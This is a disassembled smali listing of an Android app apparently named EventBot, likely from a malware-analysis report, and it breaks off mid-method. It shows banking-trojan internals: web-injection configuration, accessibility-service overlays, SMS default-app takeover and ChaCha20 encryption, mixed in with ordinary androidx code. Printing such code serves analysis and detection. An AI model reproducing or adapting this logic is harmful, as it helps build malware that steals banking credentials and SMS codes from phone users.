                        8invoke-virtual {v0}, Landroid/os/StrictMode$ThreadPolicy$Builder;->build()Landroid/os/StrictMode$ThreadPolicy;
                        9move-result-object v0
                        11invoke-static {v0}, Landroid/os/StrictMode;->setThreadPolicy(Landroid/os/StrictMode$ThreadPolicy;)V
                        12return-void
                        Cross References
                        APIs
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • com.lib$webInjViewClient.context:Landroid/content/Context
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • com.lib$webInjViewClient.this$0:Lcom/lib
                        • com.lib$webInjViewClient.webViewActivity:Landroid/app/Activity
                        • android.app.Activity.finish
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] [needStop] [stop]
                        • webInjPrefs
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        4const-string v1, "[func] [activity] [webViewClient] [onPageFinished] [needStop] [stop]"
                        6invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        8iget-object v0, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        10iget-object v1, p0, Lcom/lib$webInjViewClient;->context:Landroid/content/Context;
                        12const-string v2, "webInjPrefs"
                        14iget-object v3, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        16iget-object v3, v3, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        17const/4 v4, 0x0
                        19invoke-virtual {v0, v1, v2, v3, v4}, Lcom/lib;->updateWebInjConfig(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Z)Z
                        21iget-object v0, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        22const/4 v1, 0x0
                        23iput-object v1, v0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        25iget-object v0, p0, Lcom/lib$webInjViewClient;->webViewActivity:Landroid/app/Activity;
                        27invoke-virtual {v0}, Landroid/app/Activity;->finish()V
                        28return-void
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        Strings
                        • exist
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3try_start_2:
                        4const-string v2, "exist"
                        6invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        7move-result v2
                        8if-nez v2, :cond_16
                        10const-string v2, "exist"
                        12invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        13move-result-object v2
                        15invoke-direct {p0, p1, v2}, Lcom/lib;->checkExist(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        16try_end_13: move-result v2
                        17if-eqz v2, :cond_1a
                        18cond_16: return v0
                        19catch_17: move-exception v0
                        20move v0, v1
                        21goto/16 :goto_16
                        22cond_1a: move v0, v1
                        23goto/16 :goto_16
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.view.WindowManager.removeView
                        Strings
                        • window
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        3sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        5const-string v2, "window"
                        7invoke-virtual {v0, v2}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        8move-result-object v0
                        9check-cast v0, Landroid/view/WindowManager;
                        10if-eqz v0, :cond_1b
                        12sget-object v2, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        13if-eqz v2, :cond_1b
                        15sget-object v1, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        17invoke-interface {v0, v1}, Landroid/view/WindowManager;->removeView(Landroid/view/View;)V
                        18const/4 v0, 0x0
                        19sput-object v0, Lcom/lib;->overlay:Landroid/webkit/WebView;
                        20const/4 v0, 0x1
                        21goto_1a: return v0
                        22cond_1b: move v0, v1
                        23goto/16 :goto_1a
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.view.WindowManager.removeView
                        Strings
                        • window
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2if-eqz p1, :cond_12
                        4const-string v0, "window"
                        6invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        7move-result-object v0
                        8check-cast v0, Landroid/view/WindowManager;
                        9if-eqz v0, :cond_12
                        11invoke-interface {v0, p1}, Landroid/view/WindowManager;->removeView(Landroid/view/View;)V
                        12const/4 v0, 0x1
                        13goto_11: return v0
                        14cond_12: move v0, v1
                        15goto/16 :goto_11
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.app.KeyguardManager.inKeyguardRestrictedInputMode
                        Strings
                        • keyguard
                        Position Instruction Meta Information
                        0.prologue
                        2const-string v0, "keyguard"
                        4invoke-virtual {p1, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        5move-result-object v0
                        6check-cast v0, Landroid/app/KeyguardManager;
                        7if-eqz v0, :cond_12
                        9invoke-virtual {v0}, Landroid/app/KeyguardManager;->inKeyguardRestrictedInputMode()Z
                        10move-result v0
                        11if-nez v0, :cond_12
                        12const/4 v0, 0x0
                        13goto_11: return v0
                        14cond_12: const/4 v0, 0x1
                        15goto/16 :goto_11
                        APIs
                        • android.support.v7.app.AppCompatActivity.<init>
                        • java.lang.String.toCharArray
                        Strings
                        • 0123456789abcdef
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/support/v7/app/AppCompatActivity;-><init>()V
                        3const-string v0, "0123456789abcdef"
                        5invoke-virtual {v0}, Ljava/lang/String;->toCharArray()[C
                        6move-result-object v0
                        7iput-object v0, p0, Lcom/example/eventbot/MainActivity;->HEX_ARRAY:[C
                        8return-void
                        APIs
                        • java.lang.Object.<init>
                        • com.lib$ChaCha20$WrongKeySizeException.<init>
                        • com.lib$ChaCha20$WrongNonceSizeException.<init>
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Lcom/lib$ChaCha20$WrongKeySizeException;,
                        3Lcom/lib$ChaCha20$WrongNonceSizeException;
                        4}
                        5.end annotation
                        6.prologue
                        7const/16 v7, 0xd
                        8const/16 v6, 0xc
                        9const/16 v5, 0x8
                        10const/4 v4, 0x4
                        11const/4 v3, 0x0
                        12iput-object p1, p0, Lcom/lib$ChaCha20;->this$0:Lcom/lib;
                        14invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        15const/16 v0, 0x10
                        16new-array v0, v0, [I
                        17iput-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        18array-length v0, p2
                        19const/16 v1, 0x20
                        20if-eq v0, v1, :cond_1e
                        21new-instance v0, Lcom/lib$ChaCha20$WrongKeySizeException;
                        23invoke-direct {v0, p0}, Lcom/lib$ChaCha20$WrongKeySizeException;-><init>(Lcom/lib$ChaCha20;)V
                        24throw v0
                        25cond_1e:
                        26iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        27const v1, 0x61707865
                        28aput v1, v0, v3
                        30iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        31const/4 v1, 0x1
                        32const v2, 0x3320646e
                        33aput v2, v0, v1
                        35iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        36const/4 v1, 0x2
                        37const v2, 0x79622d32
                        38aput v2, v0, v1
                        40iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        41const/4 v1, 0x3
                        42const v2, 0x6b206574
                        43aput v2, v0, v1
                        45iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        47invoke-virtual {p0, p2, v3}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        48move-result v1
                        49aput v1, v0, v4
                        51iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        52const/4 v1, 0x5
                        54invoke-virtual {p0, p2, v4}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        55move-result v2
                        56aput v2, v0, v1
                        58iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        59const/4 v1, 0x6
                        61invoke-virtual {p0, p2, v5}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        62move-result v2
                        63aput v2, v0, v1
                        65iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        66const/4 v1, 0x7
                        68invoke-virtual {p0, p2, v6}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        69move-result v2
                        70aput v2, v0, v1
                        72iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        73const/16 v1, 0x10
                        75invoke-virtual {p0, p2, v1}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        76move-result v1
                        77aput v1, v0, v5
                        79iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        80const/16 v1, 0x9
                        81const/16 v2, 0x14
                        83invoke-virtual {p0, p2, v2}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        84move-result v2
                        85aput v2, v0, v1
                        87iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        88const/16 v1, 0xa
                        89const/16 v2, 0x18
                        91invoke-virtual {p0, p2, v2}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        92move-result v2
                        93aput v2, v0, v1
                        95iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        96const/16 v1, 0xb
                        97const/16 v2, 0x1c
                        99invoke-virtual {p0, p2, v2}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        100move-result v2
                        101aput v2, v0, v1
                        102array-length v0, p3
                        103if-ne v0, v5, :cond_ae
                        105iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        106aput v3, v0, v6
                        108iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        109aput v3, v0, v7
                        111iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        112const/16 v1, 0xe
                        114invoke-virtual {p0, p3, v3}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        115move-result v2
                        116aput v2, v0, v1
                        118iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        119const/16 v1, 0xf
                        121invoke-virtual {p0, p3, v4}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        122move-result v2
                        123aput v2, v0, v1
                        124goto_ad: return-void
                        125cond_ae: array-length v0, p3
                        126if-ne v0, v6, :cond_d2
                        128iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        129aput p4, v0, v6
                        131iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        133invoke-virtual {p0, p3, v3}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        134move-result v1
                        135aput v1, v0, v7
                        137iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        138const/16 v1, 0xe
                        140invoke-virtual {p0, p3, v4}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        141move-result v2
                        142aput v2, v0, v1
                        144iget-object v0, p0, Lcom/lib$ChaCha20;->matrix:[I
                        145const/16 v1, 0xf
                        147invoke-virtual {p0, p3, v5}, Lcom/lib$ChaCha20;->littleEndianToInt([BI)I
                        148move-result v2
                        149aput v2, v0, v1
                        150goto/16 :goto_ad
                        151cond_d2: new-instance v0, Lcom/lib$ChaCha20$WrongNonceSizeException;
                        153invoke-direct {v0, p0}, Lcom/lib$ChaCha20$WrongNonceSizeException;-><init>(Lcom/lib$ChaCha20;)V
                        154throw v0
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v2, 0x0
                        2try_start_1:
                        3sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_start_6: sput-object p2, Lcom/lib;->injectJSON:Ljava/lang/String;
                        7sput-object p3, Lcom/lib;->injectJSONid:Ljava/lang/Integer;
                        8const/4 v2, 0x1
                        9if-eqz p4, :cond_2b
                        10const/4 v0, 0x0
                        12invoke-virtual {p0, p1, v0}, Lcom/lib;->startApp(Landroid/content/Context;I)Z
                        13try_end_11: move-result v2
                        14move v0, v2
                        15goto_13: sput-boolean v0, Lcom/lib;->isA11yInjected:Z
                        16try_end_15:
                        17sget-object v1, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        20goto_1a: return v0
                        21catchall_1b: move-exception v0
                        22move-object v1, v0
                        23try_start_1d:
                        24sget-object v0, Lcom/lib;->injectMutex:Ljava/util/concurrent/Semaphore;
                        26invoke-virtual {v0}, Ljava/util/concurrent/Semaphore;->release()V
                        27throw v1
                        28try_end_23: move-exception v0
                        29move v0, v2
                        30goto/16 :goto_1a
                        31catch_26: move-exception v1
                        32goto/16 :goto_1a
                        33catchall_28: move-exception v1
                        34move v2, v0
                        35goto/16 :goto_1d
                        36cond_2b: move v0, v2
                        37goto/16 :goto_13
                        APIs
                        • android.util.SparseBooleanArray.size
                        • android.util.SparseBooleanArray.keyAt
                        • android.util.SparseBooleanArray.valueAt
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->setOutputField(I)V
                        2if-nez p1, :cond_a
                        3const/4 p1, -0x1
                        5invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        6return-void
                        7cond_a:
                        8invoke-virtual {p1}, Landroid/util/SparseBooleanArray;->size()I
                        9move-result p2
                        11invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        12const/4 v0, 0x0
                        13goto_12: if-ge v0, p2, :cond_25
                        15invoke-virtual {p1, v0}, Landroid/util/SparseBooleanArray;->keyAt(I)I
                        16move-result v1
                        18invoke-virtual {p0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        20invoke-virtual {p1, v0}, Landroid/util/SparseBooleanArray;->valueAt(I)Z
                        21move-result v1
                        23invoke-virtual {p0, v1}, Landroidx/versionedparcelable/VersionedParcel;->writeBoolean(Z)V
                        24add-int/lit8 v0, v0, 0x1
                        25goto/16 :goto_12
                        26cond_25: return-void
                        Cross References
                        APIs
                        • android.util.SparseArray.<init>
                        • java.io.DataInputStream.<init>
                        • java.io.DataOutputStream.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroidx/versionedparcelable/VersionedParcel;-><init>()V
                        2new-instance v0, Landroid/util/SparseArray;
                        4invoke-direct {v0}, Landroid/util/SparseArray;-><init>()V
                        5iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCachedFields:Landroid/util/SparseArray;
                        6const/4 v0, 0x0
                        7if-eqz p1, :cond_13
                        8new-instance v1, Ljava/io/DataInputStream;
                        10invoke-direct {v1, p1}, Ljava/io/DataInputStream;-><init>(Ljava/io/InputStream;)V
                        11goto/16 :goto_14
                        12cond_13: move-object v1, v0
                        13goto_14: iput-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterInput:Ljava/io/DataInputStream;
                        14if-eqz p2, :cond_1d
                        15new-instance v0, Ljava/io/DataOutputStream;
                        17invoke-direct {v0, p2}, Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
                        18cond_1d: iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterOutput:Ljava/io/DataOutputStream;
                        20iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterInput:Ljava/io/DataInputStream;
                        21iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        23iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterOutput:Ljava/io/DataOutputStream;
                        24iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        25return-void
                        APIs
                        • com.example.eventbot.alarm.setAlarm
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • android.content.Intent.<init>
                        • android.content.Context.startService
                        Position Instruction Meta Information
                        0sget-boolean v0, Lcom/example/eventbot/service;->isRunning:Z
                        1if-eqz v0, :cond_10
                        3iget-object v0, p0, Lcom/example/eventbot/alarm$1;->val$context:Landroid/content/Context;
                        4const-class v1, Lcom/example/eventbot/alarm;
                        6sget-object v2, Lcom/example/eventbot/cfg;->alarmDelay:Ljava/lang/Long;
                        8invoke-static {v0, v1, v2}, Lcom/example/eventbot/alarm;->setAlarm(Landroid/content/Context;Ljava/lang/Class;Ljava/lang/Long;)Z
                        10sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        11goto/16 :goto_1c
                        12cond_10:
                        13iget-object v0, p0, Lcom/example/eventbot/alarm$1;->val$context:Landroid/content/Context;
                        14new-instance v1, Landroid/content/Intent;
                        15const-class v2, Lcom/example/eventbot/service;
                        17invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        19invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        20goto_1c: return-void
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getClassLoader
                        • android.os.Parcel.readParcelable
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T::",
                        3"Landroid/os/Parcelable;",
                        4">()TT;"
                        5}
                        6.end annotation
                        8iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        10invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        11move-result-object v1
                        13invoke-virtual {v1}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        14move-result-object v1
                        16invoke-virtual {v0, v1}, Landroid/os/Parcel;->readParcelable(Ljava/lang/ClassLoader;)Landroid/os/Parcelable;
                        17move-result-object v0
                        18return-object v0
                        APIs
                        • java.io.DataInputStream.readInt
                        • java.io.DataInputStream.readFully
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readInt()I
                        4move-result v0
                        5if-lez v0, :cond_10
                        6new-array v0, v0, [B
                        8iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        10invoke-virtual {v1, v0}, Ljava/io/DataInputStream;->readFully([B)V
                        11try_end_f: return-object v0
                        12cond_10: const/4 v0, 0x0
                        13return-object v0
                        14catch_12: move-exception v0
                        15new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        17invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        18throw v1
                        Cross References
                        APIs
                        • java.io.File.<init>
                        • java.io.File.exists
                        • java.io.File.length
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/io/File;
                        3invoke-direct {v0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
                        5invoke-virtual {v0}, Ljava/io/File;->exists()Z
                        6move-result v1
                        7if-eqz v1, :cond_17
                        9invoke-virtual {v0}, Ljava/io/File;->length()J
                        10move-result-wide v0
                        11const-wide/16 v2, 0x0
                        12cmp-long v0, v0, v2
                        13if-lez v0, :cond_17
                        14const/4 v0, 0x1
                        15goto_16: return v0
                        16cond_17: const/4 v0, 0x0
                        17goto/16 :goto_16
                        APIs
                        • android.os.Parcel.writeInt
                        • android.os.Parcel.writeByteArray
                        • android.os.Parcel.writeInt
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_e
                        2iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3array-length v1, p1
                        5invoke-virtual {v0, v1}, Landroid/os/Parcel;->writeInt(I)V
                        7iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        9invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeByteArray([B)V
                        10goto/16 :goto_14
                        11cond_e:
                        12iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        13const/4 v0, -0x1
                        15invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeInt(I)V
                        16goto_14: return-void
                        APIs
                        • android.os.Parcel.writeInt
                        • android.os.Parcel.writeByteArray
                        • android.os.Parcel.writeInt
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_e
                        2iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3array-length v1, p1
                        5invoke-virtual {v0, v1}, Landroid/os/Parcel;->writeInt(I)V
                        7iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        9invoke-virtual {v0, p1, p2, p3}, Landroid/os/Parcel;->writeByteArray([BII)V
                        10goto/16 :goto_14
                        11cond_e:
                        12iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        13const/4 p2, -0x1
                        15invoke-virtual {p1, p2}, Landroid/os/Parcel;->writeInt(I)V
                        16goto_14: return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.onActivityResult
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        Position Instruction Meta Information
                        1invoke-super {p0, p1, p2, p3}, Landroid/support/v7/app/AppCompatActivity;->onActivityResult(IILandroid/content/Intent;)V
                        2try_start_3:
                        3sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        4if-eqz v0, :cond_14
                        6sget-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        8invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        9move-result-object p1
                        11invoke-static {p2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        12move-result-object p2
                        14invoke-interface {v0, p0, p1, p2, p3}, Lcom/libInterface;->doActivityResult(Landroid/content/Context;Ljava/lang/Integer;Ljava/lang/Integer;Landroid/content/Intent;)Z
                        15try_end_14: return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        • java.io.ByteArrayOutputStream.<init>
                        • java.io.DataOutputStream.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2new-instance v0, Ljava/io/ByteArrayOutputStream;
                        4invoke-direct {v0}, Ljava/io/ByteArrayOutputStream;-><init>()V
                        5iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mOutput:Ljava/io/ByteArrayOutputStream;
                        6new-instance v0, Ljava/io/DataOutputStream;
                        8iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mOutput:Ljava/io/ByteArrayOutputStream;
                        10invoke-direct {v0, v1}, Ljava/io/DataOutputStream;-><init>(Ljava/io/OutputStream;)V
                        11iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mDataStream:Ljava/io/DataOutputStream;
                        12iput p1, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mFieldId:I
                        13iput-object p2, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mTarget:Ljava/io/DataOutputStream;
                        14return-void
                        APIs
                        • java.lang.Object.getClass
                        • java.lang.Class.getClassLoader
                        • android.os.Parcel.readBundle
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        4move-result-object v1
                        6invoke-virtual {v1}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        7move-result-object v1
                        9invoke-virtual {v0, v1}, Landroid/os/Parcel;->readBundle(Ljava/lang/ClassLoader;)Landroid/os/Bundle;
                        10move-result-object v0
                        11return-object v0
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • android.view.accessibility.AccessibilityNodeInfo.getWindow
                        • android.view.accessibility.AccessibilityWindowInfo.getRoot
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        3move-result-object v0
                        5invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityNodeInfo;->getWindow()Landroid/view/accessibility/AccessibilityWindowInfo;
                        6move-result-object v0
                        8invoke-virtual {v0}, Landroid/view/accessibility/AccessibilityWindowInfo;->getRoot()Landroid/view/accessibility/AccessibilityNodeInfo;
                        9move-result-object v0
                        10return-object v0
                        Cross References
                        APIs
                        • android.provider.Telephony$Sms.getDefaultSmsPackage
                        • android.content.Context.getPackageName
                        • java.lang.String.equals
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-static {p1}, Landroid/provider/Telephony$Sms;->getDefaultSmsPackage(Landroid/content/Context;)Ljava/lang/String;
                        3move-result-object v0
                        5invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
                        6move-result-object v1
                        8invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        9move-result v0
                        10return v0
                        Cross References
                        APIs
                        • java.lang.String.equals
                        Strings
                        • smsPrefs
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "smsPrefs"
                        5invoke-virtual {p0, p1, v1}, Lcom/lib;->getSystemSmsApp(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        6move-result-object v1
                        8invoke-virtual {p0, p1, v1}, Lcom/lib;->restoreSmsAdmin(Landroid/content/Context;Ljava/lang/String;)V
                        10invoke-virtual {p0, p1}, Lcom/lib;->getSmsAdmin(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v1
                        13const-string v2, "smsPrefs"
                        15invoke-virtual {p0, p1, v2}, Lcom/lib;->getSystemSmsApp(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        16move-result-object v2
                        18invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        19try_end_17: move-result v1
                        20if-eqz v1, :cond_1b
                        21const/4 v0, 0x1
                        22goto_1b: return v0
                        23catch_1c: move-exception v1
                        24goto/16 :goto_1b
                        APIs
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • Invalid parcel
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T::",
                        3"Landroidx/versionedparcelable/VersionedParcelable;",
                        4">(",
                        5"Landroid/os/Parcelable;",
                        6")TT;"
                        7}
                        8.end annotation
                        9instance-of v0, p0, Landroidx/versionedparcelable/ParcelImpl;
                        10if-eqz v0, :cond_b
                        11check-cast p0, Landroidx/versionedparcelable/ParcelImpl;
                        13invoke-virtual {p0}, Landroidx/versionedparcelable/ParcelImpl;->getVersionedParcel()Landroidx/versionedparcelable/VersionedParcelable;
                        14move-result-object p0
                        15return-object p0
                        16cond_b: new-instance p0, Ljava/lang/IllegalArgumentException;
                        18const-string v0, "Invalid parcel"
                        20invoke-direct {p0, v0}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        21throw p0
                        APIs
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Serialization of this object is not allowed
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_5
                        1iput-boolean p2, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mIgnoreParcelables:Z
                        2return-void
                        3cond_5: new-instance p1, Ljava/lang/RuntimeException;
                        5const-string p2, "Serialization of this object is not allowed"
                        7invoke-direct {p1, p2}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        8throw p1
                        APIs
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Parcelables cannot be written to an OutputStream
                        Position Instruction Meta Information
                        0iget-boolean p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mIgnoreParcelables:Z
                        1if-eqz p1, :cond_5
                        2return-void
                        3cond_5: new-instance p1, Ljava/lang/RuntimeException;
                        5const-string v0, "Parcelables cannot be written to an OutputStream"
                        7invoke-direct {p1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        8throw p1
                        APIs
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Binders cannot be written to an OutputStream
                        Position Instruction Meta Information
                        0iget-boolean p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mIgnoreParcelables:Z
                        1if-eqz p1, :cond_5
                        2return-void
                        3cond_5: new-instance p1, Ljava/lang/RuntimeException;
                        5const-string v0, "Binders cannot be written to an OutputStream"
                        7invoke-direct {p1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        8throw p1
                        APIs
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Binders cannot be written to an OutputStream
                        Position Instruction Meta Information
                        0iget-boolean p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mIgnoreParcelables:Z
